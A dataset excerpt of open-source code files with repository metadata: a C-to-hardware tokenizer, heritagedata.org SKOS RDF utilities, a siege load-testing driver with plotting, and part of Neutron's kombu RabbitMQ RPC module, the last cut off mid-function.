| repo_name (stringlengths 5–92) | path (stringlengths 4–221) | copies (stringclasses, 19 values) | size (stringlengths 4–6) | content (stringlengths 766–896k) | license (stringclasses, 15 values) | hash (int64, -9,223,277,421,539,062,000 to 9,223,102,107B) | line_mean (float64, 6.51–99.9) | line_max (int64, 32–997) | alpha_frac (float64, 0.25–0.96) | autogenerated (bool, 1 class) | ratio (float64, 1.5–13.6) | config_test (bool, 2 classes) | has_no_keywords (bool, 2 classes) | few_assignments (bool, 1 class) |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
dawsonjon/Chips-2.0
|
chips/compiler/tokens.py
|
1
|
9314
|
__author__ = "Jon Dawson"
__copyright__ = "Copyright (C) 2012, Jonathan P Dawson"
__version__ = "0.1"
import os.path
import subprocess
from chips.compiler.exceptions import C2CHIPError
operators = [
"!", "~", "+", "-", "*", "/", "//", "%", "=", "==", "<", ">", "<=", ">=",
"!=", "|", "&", "^", "||", "&&", "(", ")", "{", "}", "[", "]", ";", "<<",
">>", ",", "+=", "-=", "*=", "/=", "%=", "&=", "|=", "<<=", ">>=", "^=",
"++", "--", "?", ":", ".", "->",
]
class Tokens:
"""Break the input file into a stream of tokens,
provide functions to traverse the stream."""
def __init__(self, filename, parameters={}):
self.tokens = []
self.definitions = []
self.filename = None
self.lineno = None
self.scan(
os.path.join(os.path.dirname(__file__), "builtins.h"),
external_preprocessor=False)
self.scan(os.path.abspath(filename))
tokens = []
for token in self.tokens:
f, l, t = token
if t in parameters:
tokens.append((f, l, str(parameters[t])))
else:
tokens.append(token)
self.tokens = tokens
def scan(self,
filename,
input_file=None,
parameters={},
external_preprocessor=True):
"""Convert the test file into tokens"""
self.filename = filename
if external_preprocessor:
directory = os.path.abspath(__file__)
directory = os.path.dirname(directory)
directory = os.path.join(directory, "include")
cpp_commands = [
"cpp",
"-nostdinc",
"-isystem",
directory,
filename]
pipe = subprocess.Popen(cpp_commands, stdout=subprocess.PIPE)
input_file = pipe.stdout
else:
if input_file is None:
try:
input_file = open(self.filename)
except IOError:
raise C2CHIPError("Cannot open file: " + self.filename)
token = []
tokens = []
self.lineno = 1
jump = False
for line in input_file:
# include files
line = line + " "
if jump:
if line.strip().startswith("#endif"):
jump = False
if line.strip().startswith("#else"):
jump = False
self.lineno += 1
continue
elif external_preprocessor and line.strip().startswith("#"):
l = line.strip()
l = l.lstrip("#")
l = l.split('"')
lineno = int(l[0].strip())
self.lineno = lineno
filename = l[1].strip().strip('"')
self.filename = filename
continue
elif line.strip().startswith("#include"):
filename = self.filename
lineno = self.lineno
self.tokens.extend(tokens)
if line.strip().endswith(">"):
directory = os.path.abspath(__file__)
directory = os.path.dirname(directory)
directory = os.path.join(directory, "include")
else:
directory = os.path.abspath(self.filename)
directory = os.path.dirname(directory)
self.filename = line.strip().replace(
"#include", "").strip(' ><"')
self.filename = os.path.join(directory, self.filename)
self.scan(self.filename)
self.lineno = lineno
self.filename = filename
tokens = []
self.lineno += 1
continue
elif line.strip().startswith("#define"):
definition = line.strip().split(" ")[1]
self.definitions.append(definition)
self.lineno += 1
continue
elif line.strip().startswith("#undef"):
definition = line.strip().split(" ")[1]
self.definitions.remove(definition)
self.lineno += 1
continue
elif line.strip().startswith("#ifdef"):
definition = line.strip().split(" ")[1]
if definition not in self.definitions:
jump = True
self.lineno += 1
continue
elif line.strip().startswith("#ifndef"):
definition = line.strip().split(" ")[1]
if definition in self.definitions:
jump = True
self.lineno += 1
continue
elif line.strip().startswith("#else"):
jump = True
self.lineno += 1
continue
elif line.strip().startswith("#endif"):
self.lineno += 1
continue
newline = True
for char in line:
if not token:
token = char
# c style comment
elif (token + char).startswith("/*"):
if (token + char).endswith("*/"):
token = ""
else:
token += char
# c++ style comment
elif token.startswith("//"):
if newline:
token = char
else:
token += char
# identifier
elif token[0].isalpha():
if char.isalnum() or char == "_":
token += char
else:
tokens.append((self.filename, self.lineno, token))
token = char
# number
elif token[0].isdigit():
if char.upper() in "0123456789ABCDEFXUL.":
token += char
elif token.upper().endswith("E") and char in ["+", "-"]:
token += char
else:
tokens.append((self.filename, self.lineno, token))
token = char
# string literal
elif token.startswith('"'):
if char == '"' and previous_char != "\\":
token += char
tokens.append((self.filename, self.lineno, token))
token = ""
else:
# remove dummy space from the end of a line
if newline:
token = token[:-1]
previous_char = char
token += char
# character literal
elif token.startswith("'"):
if char == "'":
token += char
tokens.append((self.filename, self.lineno, token))
token = ""
else:
token += char
# operator
elif token in operators:
if token + char in operators:
token += char
else:
tokens.append((self.filename, self.lineno, token))
token = char
else:
token = char
newline = False
self.lineno += 1
self.tokens.extend(tokens)
def error(self, string):
"""
Generate an error message (including the filename and line number)
"""
raise C2CHIPError(string + "\n", self.filename, self.lineno)
def peek(self):
"""
Return the next token in the stream, but don't consume it.
"""
if self.tokens:
return self.tokens[0][2]
else:
return ""
def peek_next(self):
"""
        Return the token after the next one in the stream, but don't consume it.
"""
if len(self.tokens) > 1:
return self.tokens[1][2]
else:
return ""
def get(self):
"""Return the next token in the stream, and consume it."""
if self.tokens:
self.lineno = self.tokens[0][1]
self.filename = self.tokens[0][0]
try:
filename, lineno, token = self.tokens.pop(0)
except IndexError:
self.error("Unexpected end of file")
return token
def end(self):
"""Return True if all the tokens have been consumed."""
return not self.tokens
def expect(self, expected):
"""Consume the next token in the stream,
generate an error if it is not as expected."""
try:
filename, lineno, actual = self.tokens.pop(0)
except IndexError:
self.error("Unexpected end of file")
if self.tokens:
self.lineno = self.tokens[0][1]
self.filename = self.tokens[0][0]
if actual == expected:
return
else:
self.error("Expected: %s, got: %s" % (expected, actual))
|
mit
| 3,926,535,980,926,046,000
| 31.340278
| 77
| 0.432467
| false
| 5.045504
| false
| false
| false
|
OnroerendErfgoed/skosprovider_heritagedata
|
skosprovider_heritagedata/utils.py
|
1
|
5488
|
# -*- coding: utf-8 -*-
'''
Utility functions for :mod:`skosprovider_heritagedata`.
'''
import requests
from skosprovider.skos import (
Concept,
Label,
Note,
ConceptScheme)
from skosprovider.exceptions import ProviderUnavailableException
import logging
import sys
import requests
log = logging.getLogger(__name__)
PY3 = sys.version_info[0] == 3
if PY3: # pragma: no cover
binary_type = bytes
else: # pragma: no cover
binary_type = str
import rdflib
from rdflib.term import URIRef
from rdflib.namespace import RDF, SKOS, DC, DCTERMS, RDFS
PROV = rdflib.Namespace('http://www.w3.org/ns/prov#')
def conceptscheme_from_uri(conceptscheme_uri, **kwargs):
'''
Read a SKOS Conceptscheme from a :term:`URI`
:param string conceptscheme_uri: URI of the conceptscheme.
:rtype: skosprovider.skos.ConceptScheme
'''
s = kwargs.get('session', requests.Session())
graph = uri_to_graph('%s.rdf' % (conceptscheme_uri), session=s)
notes = []
labels = []
if graph is not False:
for s, p, o in graph.triples((URIRef(conceptscheme_uri), RDFS.label, None)):
label = Label(o.toPython(), "prefLabel", 'en')
labels.append(label)
for s, p, o in graph.triples((URIRef(conceptscheme_uri), DCTERMS.description, None)):
note = Note(o.toPython(), "scopeNote", 'en')
notes.append(note)
# get the conceptscheme
conceptscheme = ConceptScheme(
conceptscheme_uri,
labels=labels,
notes=notes
)
return conceptscheme
def things_from_graph(graph, concept_scheme):
'''
Read concepts and collections from a graph.
:param rdflib.Graph graph: Graph to read from.
:param skosprovider.skos.ConceptScheme concept_scheme: Conceptscheme the
concepts and collections belong to.
:rtype: :class:`list`
'''
clist = []
for sub, pred, obj in graph.triples((None, RDF.type, SKOS.Concept)):
uri = str(sub)
con = Concept(
id=_split_uri(uri, 1),
uri=uri,
concept_scheme = concept_scheme,
labels = _create_from_subject_typelist(graph, sub, Label.valid_types),
notes = _create_from_subject_typelist(graph, sub, Note.valid_types),
broader = _create_from_subject_predicate(graph, sub, SKOS.broader),
narrower = _create_from_subject_predicate(graph, sub, SKOS.narrower),
related = _create_from_subject_predicate(graph, sub, SKOS.related),
subordinate_arrays = []
)
clist.append(con)
# at this moment, Heritagedata does not support SKOS.Collection
# for sub, pred, obj in graph.triples((None, RDF.type, SKOS.Collection)):
# uri = str(sub)
# col = Collection(_split_uri(uri, 1), uri=uri)
# col.members = _create_from_subject_predicate(sub, SKOS.member)
# col.labels = _create_from_subject_typelist(sub, Label.valid_types)
# col.notes = _create_from_subject_typelist(sub, Note.valid_types)
# clist.append(col)
return clist
def _create_from_subject_typelist(graph, subject, typelist):
list = []
for p in typelist:
term = SKOS.term(p)
list.extend(_create_from_subject_predicate(graph, subject, term))
return list
def _create_from_subject_predicate(graph, subject, predicate):
list = []
for s, p, o in graph.triples((subject, predicate, None)):
type = predicate.split('#')[-1]
if Label.is_valid_type(type):
o = _create_label(o, type)
elif Note.is_valid_type(type):
o = _create_note(o, type)
else:
o = _split_uri(o, 1)
if o:
list.append(o)
return list
def _create_label(literal, type):
language = literal.language
if language is None:
        language = 'und'  # use the undefined language code when no language is set
return Label(literal.toPython(), type, language)
def _create_note(literal, type):
if not Note.is_valid_type(type):
raise ValueError('Type of Note is not valid.')
return Note(text_(literal.value, encoding="utf-8"), type, _get_language_from_literal(literal))
def _get_language_from_literal(data):
if data.language is None:
return 'und' # return undefined code when no language
return text_(data.language, encoding="utf-8")
def _split_uri(uri, index):
return uri.strip('/').rsplit('/', 1)[index]
def uri_to_graph(uri, **kwargs):
'''
:param string uri: :term:`URI` where the RDF data can be found.
:rtype: rdflib.Graph
:raises skosprovider.exceptions.ProviderUnavailableException: if the
heritagedata.org services are down
'''
s = kwargs.get('session', requests.Session())
graph = rdflib.Graph()
try:
res = s.get(uri)
except requests.ConnectionError as e:
raise ProviderUnavailableException("URI not available: %s" % uri)
if res.status_code == 404:
return False
graph.parse(data=res.content)
    # heritagedata.org returns an empty page/graph when a resource does not exist (status_code 200). For this reason we return False if the graph is empty.
if len(graph) == 0:
return False
return graph
def text_(s, encoding='latin-1', errors='strict'):
""" If ``s`` is an instance of ``binary_type``, return
``s.decode(encoding, errors)``, otherwise return ``s``"""
if isinstance(s, binary_type):
return s.decode(encoding, errors)
return s
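# Illustrative usage sketch, not part of the original module: the URI below is an
# example heritagedata.org scheme and a live network connection is assumed;
# conceptscheme_from_uri() fetches '<uri>.rdf' and maps RDFS.label and
# DCTERMS.description onto SKOS labels and notes.
if __name__ == '__main__':  # pragma: no cover
    scheme = conceptscheme_from_uri('http://purl.org/heritagedata/schemes/eh_period')
    print(scheme.uri)
    for label in scheme.labels:
        print(label.language, label.label)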
|
mit
| 6,342,921,371,170,018,000
| 30.54023
| 152
| 0.636662
| false
| 3.538362
| false
| false
| false
|
mr-ping/WebTesting
|
main.py
|
1
|
5059
|
#!/usr/bin/python
import os
import sys
import argparse
from log import Log
from chat import Trend
from chat import plot_trend as pl
from settings import *
def parse_args():
"""
    Parse shell command arguments and override the appropriate params
    from the settings module.
:return: None
"""
parser = argparse.ArgumentParser(version=VERSION)
parser.add_argument('-u', action='store', dest='url')
parser.add_argument('-f', action='store', dest='url_file')
parser.add_argument('-t', action='store', dest='target_log_file')
parser.add_argument('-l', action='store', dest='log_file')
parser.add_argument('-p', action='store_true', dest='plotting', default=True)
parser.add_argument('-m', action='store', dest='max_allowed_concurrent', type=int)
parser.add_argument('-b', action='store', dest='base_concurrent', type=int)
parser.add_argument('-s', action='store', dest='step_concurrent', type=int)
result = parser.parse_args()
if result.url:
global url
url = result.url
if result.url_file:
global url_file
url_file = result.url_file
if result.target_log_file:
global target_file
target_file = result.target_log_file
if result.log_file:
global log_file
log_file = result.log_file
if result.plotting:
global plotting
plotting = result.plotting
if result.max_allowed_concurrent:
global max_concurrent
max_concurrent = result.max_allowed_concurrent
if result.base_concurrent:
global base_concurrent
base_concurrent = result.base_concurrent
if result.step_concurrent:
global step_concurrent
step_concurrent = result.step_concurrent
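# Illustrative invocation sketch (file names and numbers are made-up examples);
# every flag that is supplied overrides the matching value imported from the
# settings module before the test starts:
#
#     python main.py -f urls.txt -b 10 -s 5 -m 200 -l siege.log -t target.log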
def check_url_source():
"""
    Check whether the urls come from the command line or from a urls file.
    :return: A flag that represents the source of urls. String
"""
global plotting
if not url_file and not url:
plotting = False
        sys.stderr.write('You must specify the url source.')
elif url_file and url:
plotting = False
        sys.stderr.write('Url source must come from either a url address or a url file, not both.')
elif url_file:
exist = os.path.exists(url_file)
if exist:
return 'file'
else:
plotting = False
sys.stderr.write('No such urls file.')
elif url:
return 'address'
def test(base_concurrent):
"""
    Main method that runs the test.
    Loops the siege tool until the stop conditions are satisfied,
    and generates a new log file from the siege log file.
    :param base_concurrent: initial number of concurrent users
:return: None
"""
url_source = check_url_source()
while True:
for i in range(num_samples):
if url_source == 'address':
#os.system('siege -c {concurrent} -t {duration} -l {address}'\
os.system('siege -c {concurrent} -r {repeat} -l {address}'\
.format(address=url,
concurrent=base_concurrent,
#duration=duration))
repeat=repeat))
elif url_source == 'file':
#os.system('siege -c {concurrent} -t {duration} -f {url_file} -l'\
os.system('siege -c {concurrent} -r {repeat} -f {url_file} -l'\
.format(url_file=url_file,
concurrent=base_concurrent,
#duration=duration))
repeat=repeat))
last = Log.get_last_logs(log_file, siege_log_line_length, 1,\
base_concurrent)
Log.add_new_log(target_file, last)
base_concurrent += step_concurrent
log = Log(target_file)
if log.get_last_arrive_rate(num_samples) < (1-fails_allowed) \
or base_concurrent > max_concurrent:
break
def plot():
"""
    Plot charts using the data analyzed from the testing log.
:return: None
"""
log = Log(target_file)
trans_rate_dict = log.get_steps_trans_rate()
arrive_rate_dict = log.get_steps_arrive_rate()
resp_time_dict = log.get_steps_resp_time()
trans_trend = Trend('Transaction Rate',
'simulated users',
'trans rate (trans/sec)',
'g', 1, 'bar',
step_concurrent/2)
trans_trend.get_points(trans_rate_dict)
arrive_trend = Trend('Arrive Rate',
'simulated users',
'arrive rate',
'g', 2, 'line')
arrive_trend.get_points(arrive_rate_dict)
resp_trend = Trend('Resp Time',
'simulated users',
'time(sec)',
'r', 2, 'line')
resp_trend.get_points(resp_time_dict)
pl(trans_trend, resp_trend, arrive_trend)
if __name__ == '__main__':
parse_args()
test(base_concurrent)
if plotting:
plot()
|
mit
| 379,554,074,709,667,840
| 31.63871
| 86
| 0.567108
| false
| 3.999209
| false
| false
| false
|
rickerc/neutron_audit
|
neutron/openstack/common/rpc/impl_kombu.py
|
1
|
32063
|
# vim: tabstop=4 shiftwidth=4 softtabstop=4
# Copyright 2011 OpenStack Foundation
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import functools
import itertools
import socket
import ssl
import sys
import time
import uuid
import eventlet
import greenlet
import kombu
import kombu.connection
import kombu.entity
import kombu.messaging
from oslo.config import cfg
from neutron.openstack.common import excutils
from neutron.openstack.common.gettextutils import _
from neutron.openstack.common import network_utils
from neutron.openstack.common.rpc import amqp as rpc_amqp
from neutron.openstack.common.rpc import common as rpc_common
kombu_opts = [
cfg.StrOpt('kombu_ssl_version',
default='',
help='SSL version to use (valid only if SSL enabled)'),
cfg.StrOpt('kombu_ssl_keyfile',
default='',
help='SSL key file (valid only if SSL enabled)'),
cfg.StrOpt('kombu_ssl_certfile',
default='',
help='SSL cert file (valid only if SSL enabled)'),
cfg.StrOpt('kombu_ssl_ca_certs',
default='',
help=('SSL certification authority file '
'(valid only if SSL enabled)')),
cfg.StrOpt('rabbit_host',
default='localhost',
help='The RabbitMQ broker address where a single node is used'),
cfg.IntOpt('rabbit_port',
default=5672,
help='The RabbitMQ broker port where a single node is used'),
cfg.ListOpt('rabbit_hosts',
default=['$rabbit_host:$rabbit_port'],
help='RabbitMQ HA cluster host:port pairs'),
cfg.BoolOpt('rabbit_use_ssl',
default=False,
help='connect over SSL for RabbitMQ'),
cfg.StrOpt('rabbit_userid',
default='guest',
help='the RabbitMQ userid'),
cfg.StrOpt('rabbit_password',
default='guest',
help='the RabbitMQ password',
secret=True),
cfg.StrOpt('rabbit_virtual_host',
default='/',
help='the RabbitMQ virtual host'),
cfg.IntOpt('rabbit_retry_interval',
default=1,
help='how frequently to retry connecting with RabbitMQ'),
cfg.IntOpt('rabbit_retry_backoff',
default=2,
help='how long to backoff for between retries when connecting '
'to RabbitMQ'),
cfg.IntOpt('rabbit_max_retries',
default=0,
help='maximum retries with trying to connect to RabbitMQ '
'(the default of 0 implies an infinite retry count)'),
cfg.BoolOpt('rabbit_ha_queues',
default=False,
                help='use H/A queues in RabbitMQ (x-ha-policy: all). '
'You need to wipe RabbitMQ database when '
'changing this option.'),
]
cfg.CONF.register_opts(kombu_opts)
LOG = rpc_common.LOG
def _get_queue_arguments(conf):
"""Construct the arguments for declaring a queue.
If the rabbit_ha_queues option is set, we declare a mirrored queue
as described here:
http://www.rabbitmq.com/ha.html
Setting x-ha-policy to all means that the queue will be mirrored
to all nodes in the cluster.
"""
return {'x-ha-policy': 'all'} if conf.rabbit_ha_queues else {}
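# Illustrative sketch, not part of the original module: the dict returned above
# is handed to kombu as queue_arguments, so with rabbit_ha_queues enabled every
# declared queue carries the mirroring policy.
#
#     cfg.CONF.set_override('rabbit_ha_queues', True)
#     _get_queue_arguments(cfg.CONF)   # -> {'x-ha-policy': 'all'}
#     cfg.CONF.set_override('rabbit_ha_queues', False)
#     _get_queue_arguments(cfg.CONF)   # -> {}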
class ConsumerBase(object):
"""Consumer base class."""
def __init__(self, channel, callback, tag, **kwargs):
"""Declare a queue on an amqp channel.
'channel' is the amqp channel to use
'callback' is the callback to call when messages are received
'tag' is a unique ID for the consumer on the channel
queue name, exchange name, and other kombu options are
passed in here as a dictionary.
"""
self.callback = callback
self.tag = str(tag)
self.kwargs = kwargs
self.queue = None
self.reconnect(channel)
def reconnect(self, channel):
"""Re-declare the queue after a rabbit reconnect."""
self.channel = channel
self.kwargs['channel'] = channel
self.queue = kombu.entity.Queue(**self.kwargs)
self.queue.declare()
def consume(self, *args, **kwargs):
"""Actually declare the consumer on the amqp channel. This will
start the flow of messages from the queue. Using the
Connection.iterconsume() iterator will process the messages,
calling the appropriate callback.
If a callback is specified in kwargs, use that. Otherwise,
use the callback passed during __init__()
        If kwargs['nowait'] is True, the consumer is declared without
        waiting for a confirmation from the broker.
Messages will automatically be acked if the callback doesn't
raise an exception
"""
options = {'consumer_tag': self.tag}
options['nowait'] = kwargs.get('nowait', False)
callback = kwargs.get('callback', self.callback)
if not callback:
raise ValueError("No callback defined")
def _callback(raw_message):
message = self.channel.message_to_python(raw_message)
try:
msg = rpc_common.deserialize_msg(message.payload)
callback(msg)
except Exception:
LOG.exception(_("Failed to process message... skipping it."))
finally:
message.ack()
self.queue.consume(*args, callback=_callback, **options)
def cancel(self):
"""Cancel the consuming from the queue, if it has started."""
try:
self.queue.cancel(self.tag)
except KeyError as e:
            # NOTE(comstud): Kludge to get around an amqplib bug
if str(e) != "u'%s'" % self.tag:
raise
self.queue = None
class DirectConsumer(ConsumerBase):
"""Queue/consumer class for 'direct'."""
def __init__(self, conf, channel, msg_id, callback, tag, **kwargs):
"""Init a 'direct' queue.
'channel' is the amqp channel to use
'msg_id' is the msg_id to listen on
'callback' is the callback to call when messages are received
'tag' is a unique ID for the consumer on the channel
Other kombu options may be passed
"""
# Default options
options = {'durable': False,
'queue_arguments': _get_queue_arguments(conf),
'auto_delete': True,
'exclusive': False}
options.update(kwargs)
exchange = kombu.entity.Exchange(name=msg_id,
type='direct',
durable=options['durable'],
auto_delete=options['auto_delete'])
super(DirectConsumer, self).__init__(channel,
callback,
tag,
name=msg_id,
exchange=exchange,
routing_key=msg_id,
**options)
class TopicConsumer(ConsumerBase):
"""Consumer class for 'topic'."""
def __init__(self, conf, channel, topic, callback, tag, name=None,
exchange_name=None, **kwargs):
"""Init a 'topic' queue.
:param channel: the amqp channel to use
:param topic: the topic to listen on
:paramtype topic: str
:param callback: the callback to call when messages are received
:param tag: a unique ID for the consumer on the channel
:param name: optional queue name, defaults to topic
:paramtype name: str
Other kombu options may be passed as keyword arguments
"""
# Default options
options = {'durable': conf.amqp_durable_queues,
'queue_arguments': _get_queue_arguments(conf),
'auto_delete': conf.amqp_auto_delete,
'exclusive': False}
options.update(kwargs)
exchange_name = exchange_name or rpc_amqp.get_control_exchange(conf)
exchange = kombu.entity.Exchange(name=exchange_name,
type='topic',
durable=options['durable'],
auto_delete=options['auto_delete'])
super(TopicConsumer, self).__init__(channel,
callback,
tag,
name=name or topic,
exchange=exchange,
routing_key=topic,
**options)
class FanoutConsumer(ConsumerBase):
"""Consumer class for 'fanout'."""
def __init__(self, conf, channel, topic, callback, tag, **kwargs):
"""Init a 'fanout' queue.
'channel' is the amqp channel to use
'topic' is the topic to listen on
'callback' is the callback to call when messages are received
'tag' is a unique ID for the consumer on the channel
Other kombu options may be passed
"""
unique = uuid.uuid4().hex
exchange_name = '%s_fanout' % topic
queue_name = '%s_fanout_%s' % (topic, unique)
# Default options
options = {'durable': False,
'queue_arguments': _get_queue_arguments(conf),
'auto_delete': True,
'exclusive': False}
options.update(kwargs)
exchange = kombu.entity.Exchange(name=exchange_name, type='fanout',
durable=options['durable'],
auto_delete=options['auto_delete'])
super(FanoutConsumer, self).__init__(channel, callback, tag,
name=queue_name,
exchange=exchange,
routing_key=topic,
**options)
class Publisher(object):
"""Base Publisher class."""
def __init__(self, channel, exchange_name, routing_key, **kwargs):
"""Init the Publisher class with the exchange_name, routing_key,
and other options
"""
self.exchange_name = exchange_name
self.routing_key = routing_key
self.kwargs = kwargs
self.reconnect(channel)
def reconnect(self, channel):
"""Re-establish the Producer after a rabbit reconnection."""
self.exchange = kombu.entity.Exchange(name=self.exchange_name,
**self.kwargs)
self.producer = kombu.messaging.Producer(exchange=self.exchange,
channel=channel,
routing_key=self.routing_key)
def send(self, msg, timeout=None):
"""Send a message."""
if timeout:
#
# AMQP TTL is in milliseconds when set in the header.
#
self.producer.publish(msg, headers={'ttl': (timeout * 1000)})
else:
self.producer.publish(msg)
class DirectPublisher(Publisher):
"""Publisher class for 'direct'."""
def __init__(self, conf, channel, msg_id, **kwargs):
"""init a 'direct' publisher.
Kombu options may be passed as keyword args to override defaults
"""
options = {'durable': False,
'auto_delete': True,
'exclusive': False}
options.update(kwargs)
super(DirectPublisher, self).__init__(channel, msg_id, msg_id,
type='direct', **options)
class TopicPublisher(Publisher):
"""Publisher class for 'topic'."""
def __init__(self, conf, channel, topic, **kwargs):
"""init a 'topic' publisher.
Kombu options may be passed as keyword args to override defaults
"""
options = {'durable': conf.amqp_durable_queues,
'auto_delete': conf.amqp_auto_delete,
'exclusive': False}
options.update(kwargs)
exchange_name = rpc_amqp.get_control_exchange(conf)
super(TopicPublisher, self).__init__(channel,
exchange_name,
topic,
type='topic',
**options)
class FanoutPublisher(Publisher):
"""Publisher class for 'fanout'."""
def __init__(self, conf, channel, topic, **kwargs):
"""init a 'fanout' publisher.
Kombu options may be passed as keyword args to override defaults
"""
options = {'durable': False,
'auto_delete': True,
'exclusive': False}
options.update(kwargs)
super(FanoutPublisher, self).__init__(channel, '%s_fanout' % topic,
None, type='fanout', **options)
class NotifyPublisher(TopicPublisher):
"""Publisher class for 'notify'."""
def __init__(self, conf, channel, topic, **kwargs):
self.durable = kwargs.pop('durable', conf.amqp_durable_queues)
self.queue_arguments = _get_queue_arguments(conf)
super(NotifyPublisher, self).__init__(conf, channel, topic, **kwargs)
def reconnect(self, channel):
super(NotifyPublisher, self).reconnect(channel)
# NOTE(jerdfelt): Normally the consumer would create the queue, but
# we do this to ensure that messages don't get dropped if the
# consumer is started after we do
queue = kombu.entity.Queue(channel=channel,
exchange=self.exchange,
durable=self.durable,
name=self.routing_key,
routing_key=self.routing_key,
queue_arguments=self.queue_arguments)
queue.declare()
class Connection(object):
"""Connection object."""
pool = None
def __init__(self, conf, server_params=None):
self.consumers = []
self.consumer_thread = None
self.proxy_callbacks = []
self.conf = conf
self.max_retries = self.conf.rabbit_max_retries
# Try forever?
if self.max_retries <= 0:
self.max_retries = None
self.interval_start = self.conf.rabbit_retry_interval
self.interval_stepping = self.conf.rabbit_retry_backoff
# max retry-interval = 30 seconds
self.interval_max = 30
self.memory_transport = False
if server_params is None:
server_params = {}
# Keys to translate from server_params to kombu params
server_params_to_kombu_params = {'username': 'userid'}
ssl_params = self._fetch_ssl_params()
params_list = []
for adr in self.conf.rabbit_hosts:
hostname, port = network_utils.parse_host_port(
adr, default_port=self.conf.rabbit_port)
params = {
'hostname': hostname,
'port': port,
'userid': self.conf.rabbit_userid,
'password': self.conf.rabbit_password,
'virtual_host': self.conf.rabbit_virtual_host,
}
for sp_key, value in server_params.iteritems():
p_key = server_params_to_kombu_params.get(sp_key, sp_key)
params[p_key] = value
if self.conf.fake_rabbit:
params['transport'] = 'memory'
if self.conf.rabbit_use_ssl:
params['ssl'] = ssl_params
params_list.append(params)
self.params_list = params_list
brokers_count = len(self.params_list)
self.next_broker_indices = itertools.cycle(range(brokers_count))
self.memory_transport = self.conf.fake_rabbit
self.connection = None
self.reconnect()
def _fetch_ssl_params(self):
"""Handles fetching what ssl params should be used for the connection
(if any).
"""
ssl_params = dict()
# http://docs.python.org/library/ssl.html - ssl.wrap_socket
if self.conf.kombu_ssl_version:
ssl_params['ssl_version'] = self.conf.kombu_ssl_version
if self.conf.kombu_ssl_keyfile:
ssl_params['keyfile'] = self.conf.kombu_ssl_keyfile
if self.conf.kombu_ssl_certfile:
ssl_params['certfile'] = self.conf.kombu_ssl_certfile
if self.conf.kombu_ssl_ca_certs:
ssl_params['ca_certs'] = self.conf.kombu_ssl_ca_certs
# We might want to allow variations in the
# future with this?
ssl_params['cert_reqs'] = ssl.CERT_REQUIRED
if not ssl_params:
# Just have the default behavior
return True
else:
# Return the extended behavior
return ssl_params
def _connect(self, params):
"""Connect to rabbit. Re-establish any queues that may have
been declared before if we are reconnecting. Exceptions should
be handled by the caller.
"""
if self.connection:
LOG.info(_("Reconnecting to AMQP server on "
"%(hostname)s:%(port)d") % params)
try:
self.connection.release()
except self.connection_errors:
pass
# Setting this in case the next statement fails, though
# it shouldn't be doing any network operations, yet.
self.connection = None
self.connection = kombu.connection.BrokerConnection(**params)
self.connection_errors = self.connection.connection_errors
if self.memory_transport:
# Kludge to speed up tests.
self.connection.transport.polling_interval = 0.0
self.consumer_num = itertools.count(1)
self.connection.connect()
self.channel = self.connection.channel()
# work around 'memory' transport bug in 1.1.3
if self.memory_transport:
self.channel._new_queue('ae.undeliver')
for consumer in self.consumers:
consumer.reconnect(self.channel)
LOG.info(_('Connected to AMQP server on %(hostname)s:%(port)d') %
params)
def reconnect(self):
"""Handles reconnecting and re-establishing queues.
Will retry up to self.max_retries number of times.
self.max_retries = 0 means to retry forever.
Sleep between tries, starting at self.interval_start
seconds, backing off self.interval_stepping number of seconds
each attempt.
"""
attempt = 0
while True:
params = self.params_list[next(self.next_broker_indices)]
attempt += 1
try:
self._connect(params)
return
except (IOError, self.connection_errors) as e:
pass
except Exception as e:
# NOTE(comstud): Unfortunately it's possible for amqplib
# to return an error not covered by its transport
# connection_errors in the case of a timeout waiting for
# a protocol response. (See paste link in LP888621)
# So, we check all exceptions for 'timeout' in them
# and try to reconnect in this case.
if 'timeout' not in str(e):
raise
log_info = {}
log_info['err_str'] = str(e)
log_info['max_retries'] = self.max_retries
log_info.update(params)
if self.max_retries and attempt == self.max_retries:
LOG.error(_('Unable to connect to AMQP server on '
'%(hostname)s:%(port)d after %(max_retries)d '
'tries: %(err_str)s') % log_info)
# NOTE(comstud): Copied from original code. There's
# really no better recourse because if this was a queue we
# need to consume on, we have no way to consume anymore.
sys.exit(1)
if attempt == 1:
sleep_time = self.interval_start or 1
elif attempt > 1:
sleep_time += self.interval_stepping
if self.interval_max:
sleep_time = min(sleep_time, self.interval_max)
log_info['sleep_time'] = sleep_time
LOG.error(_('AMQP server on %(hostname)s:%(port)d is '
'unreachable: %(err_str)s. Trying again in '
'%(sleep_time)d seconds.') % log_info)
time.sleep(sleep_time)
def ensure(self, error_callback, method, *args, **kwargs):
while True:
try:
return method(*args, **kwargs)
except (self.connection_errors, socket.timeout, IOError) as e:
if error_callback:
error_callback(e)
except Exception as e:
# NOTE(comstud): Unfortunately it's possible for amqplib
# to return an error not covered by its transport
# connection_errors in the case of a timeout waiting for
# a protocol response. (See paste link in LP888621)
# So, we check all exceptions for 'timeout' in them
# and try to reconnect in this case.
if 'timeout' not in str(e):
raise
if error_callback:
error_callback(e)
self.reconnect()
def get_channel(self):
"""Convenience call for bin/clear_rabbit_queues."""
return self.channel
def close(self):
"""Close/release this connection."""
self.cancel_consumer_thread()
self.wait_on_proxy_callbacks()
self.connection.release()
self.connection = None
def reset(self):
"""Reset a connection so it can be used again."""
self.cancel_consumer_thread()
self.wait_on_proxy_callbacks()
self.channel.close()
self.channel = self.connection.channel()
# work around 'memory' transport bug in 1.1.3
if self.memory_transport:
self.channel._new_queue('ae.undeliver')
self.consumers = []
def declare_consumer(self, consumer_cls, topic, callback):
"""Create a Consumer using the class that was passed in and
add it to our list of consumers
"""
def _connect_error(exc):
log_info = {'topic': topic, 'err_str': str(exc)}
LOG.error(_("Failed to declare consumer for topic '%(topic)s': "
"%(err_str)s") % log_info)
def _declare_consumer():
consumer = consumer_cls(self.conf, self.channel, topic, callback,
self.consumer_num.next())
self.consumers.append(consumer)
return consumer
return self.ensure(_connect_error, _declare_consumer)
def iterconsume(self, limit=None, timeout=None):
"""Return an iterator that will consume from all queues/consumers."""
info = {'do_consume': True}
def _error_callback(exc):
if isinstance(exc, socket.timeout):
LOG.debug(_('Timed out waiting for RPC response: %s') %
str(exc))
raise rpc_common.Timeout()
else:
